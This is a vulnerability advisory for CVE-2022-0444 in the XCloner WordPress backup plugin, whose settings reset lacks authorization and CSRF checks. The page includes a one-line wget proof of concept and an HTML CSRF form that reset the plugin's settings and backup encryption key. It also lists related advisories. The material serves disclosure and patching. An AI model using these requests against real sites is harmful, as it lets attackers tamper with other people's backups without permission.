XCloner < 4.3.6 – Plugin Settings Reset | CVE 2022-0444 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF checks when resetting its settings, allowing unauthenticated attackers to reset them, including generating a new backup encryption key.

v4.3.5 added capability check, but CSRF one still missing.

Proof of Concept

v < 4.3.5 - wget "http://example.com/wp-admin/admin.php?action=rest-nonce" --post-data="xcloner_restore_defaults=1" -q -O-

v < 4.3.6 (via CSRF):

<form id="test" action="http://example.com/wp-admin/admin-ajax.php?action=rest-nonce" method="POST">
    <input type="text" name="xcloner_restore_defaults" value="1">
    <input type="submit" value="Submit"/>
</form>

Affects Plugins

xcloner-backup-and-restore

Fixed in 4.3.6

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

9567d295-43c7-4e59-9283-c7726f16d40b

Timeline

Publicly Published

2022-06-06 (about 1 years ago)

Added

2022-06-06 (about 1 years ago)

Last Updated

2023-03-06 (about 1 years ago)

Other

Published

Title

Published

2024-02-26

Title

Categorify < 1.0.7.5 - Missing Authorization in categorifyAjaxDeleteCategory

Published

2023-12-07

Title

WP Simple HTML Sitemap < 2.8 - Missing Authorization

Published

2024-04-11

Title

Advanced Post Block – Display Posts, Pages, or Custom Posts on Your Page <= 1.13.1 - Missing Authorization to Information Disclosure

Published

2023-09-05

Title

SAML SP Single Sign On < 5.0.5 - Missing Authorization to notice dismissal

Published

2023-11-15

Title

WPCafe < 2.2.23 - Missing Authorization